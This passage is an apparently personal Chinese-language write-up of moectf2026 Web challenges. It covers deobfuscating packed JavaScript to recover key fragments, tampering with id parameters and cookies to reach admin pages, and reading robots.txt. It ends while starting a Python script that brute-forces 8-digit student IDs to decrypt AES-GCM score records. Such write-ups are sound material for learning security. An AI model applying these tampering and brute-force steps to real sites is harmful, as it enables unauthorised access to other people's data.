

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/blank.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="blank">
  <meta name="keywords" content="">
  
    <meta name="description" content="随着解题进度更新……没打完的题目标注了thinking,只能抽时间打了（ WebWeb 安全与渗透测试入门指北下载附件打开html,F12搜索moe关键字即得 查分系统下载html，F12查看前端页面，打开script标签发现学号信息，搜索moectf关键字即得。 归途连接靶机，F12可得。key2:QDBtNG9k同时可以看到一段混淆过后的script代码 1234567891011121314">
<meta property="og:type" content="article">
<meta property="og:title" content="moectf2026">
<meta property="og:url" content="https://b1ank799.github.io/2026/09/16/moectf2026%E4%B8%AA%E4%BA%BAwp/index.html">
<meta property="og:site_name" content="blank">
<meta property="og:description" content="随着解题进度更新……没打完的题目标注了thinking,只能抽时间打了（ WebWeb 安全与渗透测试入门指北下载附件打开html,F12搜索moe关键字即得 查分系统下载html，F12查看前端页面，打开script标签发现学号信息，搜索moectf关键字即得。 归途连接靶机，F12可得。key2:QDBtNG9k同时可以看到一段混淆过后的script代码 1234567891011121314">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2026-09-16T15:34:59.000Z">
<meta property="article:modified_time" content="2026-09-16T15:41:57.780Z">
<meta property="article:author" content="blank">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>moectf2026 - blank</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"b1ank799.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"><style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style></head>



<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>blank</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="moectf2026"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-09-16 23:34" pubdate>
          September 16, 2026 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          15k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          123 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">moectf2026</h1>
            
            
              <div class="markdown-body">
                
                <p>随着解题进度更新……没打完的题目标注了thinking,只能抽时间打了（</p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="Web-安全与渗透测试入门指北"><a href="#Web-安全与渗透测试入门指北" class="headerlink" title="Web 安全与渗透测试入门指北"></a>Web 安全与渗透测试入门指北</h2><p>下载附件打开html,F12搜索moe关键字即得</p>
<h2 id="查分系统"><a href="#查分系统" class="headerlink" title="查分系统"></a>查分系统</h2><p>下载html，F12查看前端页面，打开script标签发现学号信息，搜索moectf关键字即得。</p>
<h2 id="归途"><a href="#归途" class="headerlink" title="归途"></a>归途</h2><p>连接靶机，F12可得。<br>key2:QDBtNG9k<br>同时可以看到一段混淆过后的script代码</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs js"><br><span class="hljs-built_in">eval</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params">p,a,c,k,e,d</span>){e=<span class="hljs-keyword">function</span>(<span class="hljs-params">c</span>){<span class="hljs-keyword">return</span>(c&lt;a?<span class="hljs-string">""</span>:<span class="hljs-title function_">e</span>(<span class="hljs-built_in">parseInt</span>(c/a)))+((c=c%a)&gt;<span class="hljs-number">35</span>?<span class="hljs-title class_">String</span>.<span class="hljs-title function_">fromCharCode</span>(c+<span class="hljs-number">29</span>):c.<span class="hljs-title function_">toString</span>(<span class="hljs-number">36</span>))};<span class="hljs-keyword">if</span>(!<span class="hljs-string">''</span>.<span class="hljs-title function_">replace</span>(<span class="hljs-regexp">/^/</span>,<span class="hljs-title class_">String</span>)){<span class="hljs-keyword">while</span>(c--)d[<span class="hljs-title function_">e</span>(c)]=k[c]||<span class="hljs-title function_">e</span>(c);k=[<span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>){<span class="hljs-keyword">return</span> d[e]}];e=<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>){<span class="hljs-keyword">return</span><span class="hljs-string">'\\w+'</span>};c=<span class="hljs-number">1</span>;};<span class="hljs-keyword">while</span>(c--)<span class="hljs-keyword">if</span>(k[c])p=p.<span class="hljs-title function_">replace</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">RegExp</span>(<span class="hljs-string">'\\b'</span>+<span class="hljs-title function_">e</span>(c)+<span class="hljs-string">'\\b'</span>,<span class="hljs-string">'g'</span>),k[c]);<span class="hljs-keyword">return</span> p;}(<span class="hljs-string">'1.0("3-2==");'</span>,<span class="hljs-number">4</span>,<span class="hljs-number">4</span>,<span class="hljs-string">'log|console|N2ghNUkkTQ|Key1'</span>.<span class="hljs-title function_">split</span>(<span class="hljs-string">'|'</span>),<span class="hljs-number">0</span>,{}))<br><br><span class="hljs-built_in">eval</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params">p,a,c,k,e,d</span>){e=<span class="hljs-keyword">function</span>(<span class="hljs-params">c</span>){<span class="hljs-keyword">return</span>(c&lt;a?<span class="hljs-string">""</span>:<span class="hljs-title function_">e</span>(<span class="hljs-built_in">parseInt</span>(c/a)))+((c=c%a)&gt;<span class="hljs-number">35</span>?<span class="hljs-title class_">String</span>.<span class="hljs-title function_">fromCharCode</span>(c+<span class="hljs-number">29</span>):c.<span class="hljs-title function_">toString</span>(<span class="hljs-number">36</span>))};<span class="hljs-keyword">if</span>(!<span class="hljs-string">''</span>.<span class="hljs-title function_">replace</span>(<span class="hljs-regexp">/^/</span>,<span class="hljs-title class_">String</span>)){<span class="hljs-keyword">while</span>(c--)d[<span class="hljs-title function_">e</span>(c)]=k[c]||<span class="hljs-title function_">e</span>(c);k=[<span class="hljs-keyword">function</span>(<span class="hljs-params">e</span>){<span class="hljs-keyword">return</span> d[e]}];e=<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>){<span class="hljs-keyword">return</span><span class="hljs-string">'\\w+'</span>};c=<span class="hljs-number">1</span>;};<span class="hljs-keyword">while</span>(c--)<span class="hljs-keyword">if</span>(k[c])p=p.<span class="hljs-title function_">replace</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">RegExp</span>(<span class="hljs-string">'\\b'</span>+<span class="hljs-title function_">e</span>(c)+<span class="hljs-string">'\\b'</span>,<span class="hljs-string">'g'</span>),k[c]);<span class="hljs-keyword">return</span> p;}(<span class="hljs-string">'8(()=&gt;7["\\a\\9\\3"]("\\5\\6\\4\\b\\g\\0\\h\\3\\i\\0\\f\\1\\1\\c\\d\\2\\2"),e);'</span>,<span class="hljs-number">19</span>,<span class="hljs-number">19</span>,<span class="hljs-string">'x4e|x6b|x3d|x67|x79|x4b|x65|console|setInterval|x6f|x6c|x31|x54|x51|5000|x55|x2d|x32|x68'</span>.<span class="hljs-title function_">split</span>(<span class="hljs-string">'|'</span>),<span class="hljs-number">0</span>,{}))<br><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">pollKey</span>(<span class="hljs-params"></span>) {<br>  <span class="hljs-keyword">try</span> {<br>    <span class="hljs-keyword">const</span> res = <span class="hljs-keyword">await</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-string">"/getKey?id=3"</span>, { <span class="hljs-attr">cache</span>: <span class="hljs-string">"no-store"</span> });<br>    <span class="hljs-keyword">const</span> data = <span class="hljs-keyword">await</span> res.<span class="hljs-title function_">json</span>();<br>  } <span class="hljs-keyword">catch</span> (error) {<br>    <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"api-status"</span>).<span class="hljs-property">textContent</span> = <span class="hljs-string">"Request failed"</span>;<br>  }<br>}<br><span class="hljs-title function_">pollKey</span>();<br><span class="hljs-built_in">setInterval</span>(pollKey, <span class="hljs-number">3000</span>);<br>    <br></code></pre></td></tr></table></figure>
<p>分析后可以得到key1和一个一直请求的getKey路径<br>key1:N2ghNUkkTQ==</p>
<p>访问/getKey?id=3得到key3:M0szeUVuKw==</p>
<p>更改id = 4 key4:ZXJUaDFzbGE=</p>
<p>阅读message 检查请求体发现key5:ITkzdA==</p>
<p>(本来不想开yakit还是开了…….hackbar又卡了)</p>
<p>打开yakit发post包可得key6:ZnwxbGFA,发现try login的提示</p>
<p>访问/login路径，登录guest 302跳转info被告知需要登录admin,且可能要修改cookie,我们对info路径修改cookie可得Key7：NGFAZzY5Nmc5（卡了半天我还以为要登录的admin账号……）<br>根据这一步的提示访问路径/robots.txt,接着访问 /f13ggggg<br>把所有key解码之后拼在一起可得flag<br>（真的很讨厌找flag……吐血</p>
<h2 id="查分系统-revenge"><a href="#查分系统-revenge" class="headerlink" title="查分系统_revenge"></a>查分系统_revenge</h2><p>再次打开script标签可以发现数据都被加密过了，因为懒得分析这里让ai分析了一下。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><code class="hljs js"><br><span class="hljs-keyword">const</span> commonIv = <span class="hljs-string">"bW9lY3RmMjAyNml2"</span>;<br><span class="hljs-keyword">const</span> encryptedStudentData = [<br>    {<br>        <span class="hljs-string">"数据"</span>: <span class="hljs-string">"kCyxN2+qCfUK3LMzZQzM5UqhVK7pIfstn6iWuR/HRZHnZlJtcw3CqD7IIJZDqxBsM2Oy8FvZ3RrmXFAoxbsYLHWz2pwZkMXrYHWONUrGaqZYqoKBO82Ax/kbIpqFt4tOWLU3KiTrBrKlf1sLlDbu1s3h4oC85VfM7Xo2XDxFJH0ZBoxAZamyCj+Lc3xW7k4esrG/UsOjLeCCkpcULK0uAUyvUlL5L57RmXKregggHfYIHlnL2wWkbxl+MvXBfLN2+g9dg+LNBWqTotnlnZkdyPTLc3Zd7haUKAcm7ZscbKs18FienfeZAoZnpcYy+PERStZsM/lfbiktM2qm9zm2yR5XyprlMiXJHNEwQA+BBmdUYFlKaN5twrGjN8ymc2xUU+nvgYyFrZEzyQn1Dji+0d4HQBqLQ98Vf33zkZL9ScaZIOjcmoIKFjDZ2xm1gwfZjs0Xx72XPSYiNeLbfbIrAAqg187y52EO5GR9T6SSVzd8Q0f+GlkH4Xb5acyksFWz2gniAEKr10fVaDk6LYyzEtTvJKSPR6yZs3vfXumT0nl87JvyIOeo1ID3/QyRMbvXhqPCifLa9NWbQz32rRd+UdiTPgN531aY"</span><br>    },<br>    ......  <br>];<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">b64ToBytes</span>(<span class="hljs-params">s</span>) {<br><span class="hljs-comment">//base64转Uint8Array 字节数组（存储8位无符号整数）</span><br>    <span class="hljs-keyword">const</span> bin = <span class="hljs-title function_">atob</span>(s);<br>    <span class="hljs-keyword">const</span> arr = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Uint8Array</span>(bin.<span class="hljs-property">length</span>);<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> i = <span class="hljs-number">0</span>; i &lt; bin.<span class="hljs-property">length</span>; i++) arr[i] = bin.<span class="hljs-title function_">charCodeAt</span>(i);<br>    <span class="hljs-keyword">return</span> arr;<br>}<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">esc</span>(<span class="hljs-params">s</span>) {<br><span class="hljs-comment">//字符串html实体转义，防止xss</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-title class_">String</span>(s)<br>        .<span class="hljs-title function_">replaceAll</span>(<span class="hljs-string">"&amp;"</span>, <span class="hljs-string">"&amp;amp;"</span>)<br>        .<span class="hljs-title function_">replaceAll</span>(<span class="hljs-string">"&lt;"</span>, <span class="hljs-string">"&amp;lt;"</span>)<br>        .<span class="hljs-title function_">replaceAll</span>(<span class="hljs-string">"&gt;"</span>, <span class="hljs-string">"&amp;gt;"</span>)<br>        .<span class="hljs-title function_">replaceAll</span>(<span class="hljs-string">'"'</span>, <span class="hljs-string">"&amp;quot;"</span>)<br>        .<span class="hljs-title function_">replaceAll</span>(<span class="hljs-string">"'"</span>, <span class="hljs-string">"&amp;#39;"</span>);<br>}<br><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">makeKey</span>(<span class="hljs-params">password</span>) {<br><span class="hljs-comment">//根据输入的学号（字符串）生成 AES-GCM 解密密钥</span><br>    <span class="hljs-keyword">const</span> raw = <span class="hljs-keyword">new</span> <span class="hljs-title class_">TextEncoder</span>().<span class="hljs-title function_">encode</span>(password);<br>    <span class="hljs-keyword">const</span> hash = <span class="hljs-keyword">await</span> crypto.<span class="hljs-property">subtle</span>.<span class="hljs-title function_">digest</span>(<span class="hljs-string">"SHA-256"</span>, raw);<br>    <span class="hljs-keyword">return</span> crypto.<span class="hljs-property">subtle</span>.<span class="hljs-title function_">importKey</span>(<span class="hljs-string">"raw"</span>, hash, { <span class="hljs-attr">name</span>: <span class="hljs-string">"AES-GCM"</span> }, <span class="hljs-literal">false</span>, [<span class="hljs-string">"decrypt"</span>]);<br>}<br><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">tryDecrypt</span>(<span class="hljs-params">record, sid</span>) {<br><span class="hljs-comment">//尝试用指定学号解密一条学生数据</span><br>    <span class="hljs-keyword">const</span> key = <span class="hljs-keyword">await</span> <span class="hljs-title function_">makeKey</span>(sid);<br>    <span class="hljs-keyword">const</span> iv = <span class="hljs-title function_">b64ToBytes</span>(commonIv);<br>    <span class="hljs-keyword">const</span> data = <span class="hljs-title function_">b64ToBytes</span>(record[<span class="hljs-string">"数据"</span>]);<br>    <span class="hljs-keyword">const</span> plain = <span class="hljs-keyword">await</span> crypto.<span class="hljs-property">subtle</span>.<span class="hljs-title function_">decrypt</span>({ <span class="hljs-attr">name</span>: <span class="hljs-string">"AES-GCM"</span>, iv }, key, data);<br>    <span class="hljs-keyword">const</span> student = <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">parse</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">TextDecoder</span>().<span class="hljs-title function_">decode</span>(plain));<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title class_">String</span>(student[<span class="hljs-string">"学号"</span>]) !== sid) <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Error</span>(<span class="hljs-string">"mismatch"</span>);<br>    <span class="hljs-keyword">return</span> student;<br>}<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">showErr</span>(<span class="hljs-params">msg</span>) {<br><span class="hljs-comment">//在页面上显示错误信息，隐藏结果区域</span><br>    <span class="hljs-keyword">const</span> errDom = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"error_tip"</span>);<br>    <span class="hljs-keyword">const</span> resDom = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"result_box"</span>);<br>    errDom.<span class="hljs-property">innerText</span> = msg;<br>    errDom.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">"block"</span>;<br>    resDom.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">"none"</span>;<br>}<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">showResult</span>(<span class="hljs-params">student</span>) {<br><span class="hljs-comment">//在页面上展示解密成功的学生信息</span><br>    <span class="hljs-keyword">const</span> errDom = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"error_tip"</span>);<br>    <span class="hljs-keyword">const</span> resDom = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"result_box"</span>);<br>    <span class="hljs-keyword">let</span> showHtml = <span class="hljs-string">""</span>;<br>    <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">entries</span>(student).<span class="hljs-title function_">forEach</span>(<span class="hljs-function">(<span class="hljs-params">[fieldName, val]</span>) =&gt;</span> {<br>        showHtml += <span class="hljs-string">`&lt;div&gt;<span class="hljs-subst">${esc(fieldName)}</span>：<span class="hljs-subst">${esc(val)}</span>&lt;/div&gt;`</span>;<br>    });<br>    errDom.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">"none"</span>;<br>    resDom.<span class="hljs-property">innerHTML</span> = showHtml;<br>    resDom.<span class="hljs-property">style</span>.<span class="hljs-property">display</span> = <span class="hljs-string">"block"</span>;<br>}<br><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">searchScore</span>(<span class="hljs-params"></span>) {<br><span class="hljs-comment">//查询成绩的主逻辑入口，由页面按钮点击触发</span><br>    <span class="hljs-keyword">const</span> sidDom = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"input_sid"</span>);<br>    <span class="hljs-keyword">const</span> btnDom = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"btn_search"</span>);<br>    <span class="hljs-keyword">const</span> sid = sidDom.<span class="hljs-property">value</span>.<span class="hljs-title function_">trim</span>();<br><br>    <span class="hljs-keyword">if</span> (!<span class="hljs-regexp">/^\d{8}$/</span>.<span class="hljs-title function_">test</span>(sid)) {<br>        <span class="hljs-title function_">showErr</span>(<span class="hljs-string">"请输入 8 位数字学号！"</span>);<br>        <span class="hljs-keyword">return</span>;<br>    }<br><br>    btnDom.<span class="hljs-property">disabled</span> = <span class="hljs-literal">true</span>;<br>    <span class="hljs-keyword">try</span> {<br>        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">const</span> record <span class="hljs-keyword">of</span> encryptedStudentData) {<br>            <span class="hljs-keyword">try</span> {<br>                <span class="hljs-keyword">const</span> student = <span class="hljs-keyword">await</span> <span class="hljs-title function_">tryDecrypt</span>(record, sid);<br>                <span class="hljs-title function_">showResult</span>(student);<br>                <span class="hljs-keyword">return</span>;<br>            } <span class="hljs-keyword">catch</span> (e) {}<br>        }<br>        <span class="hljs-title function_">showErr</span>(<span class="hljs-string">"学号错误"</span>);<br>    } <span class="hljs-keyword">finally</span> {<br>        btnDom.<span class="hljs-property">disabled</span> = <span class="hljs-literal">false</span>;<br>    }<br>}<br><br><span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">"input_sid"</span>).<span class="hljs-title function_">addEventListener</span>(<span class="hljs-string">"keydown"</span>, <span class="hljs-function"><span class="hljs-params">e</span> =&gt;</span> {<br>    <span class="hljs-keyword">if</span> (e.<span class="hljs-property">key</span> === <span class="hljs-string">"Enter"</span>) <span class="hljs-title function_">searchScore</span>();<br>});<br><br></code></pre></td></tr></table></figure>

<p>整个解密逻辑是学号通过sha256进行加密生成AES密钥，固定iv逐条匹配解密。<br>所以好像只能爆破了呢……..<br>脚本示例</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> json<br><span class="hljs-keyword">import</span> hashlib<br><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br><span class="hljs-keyword">from</span> multiprocessing 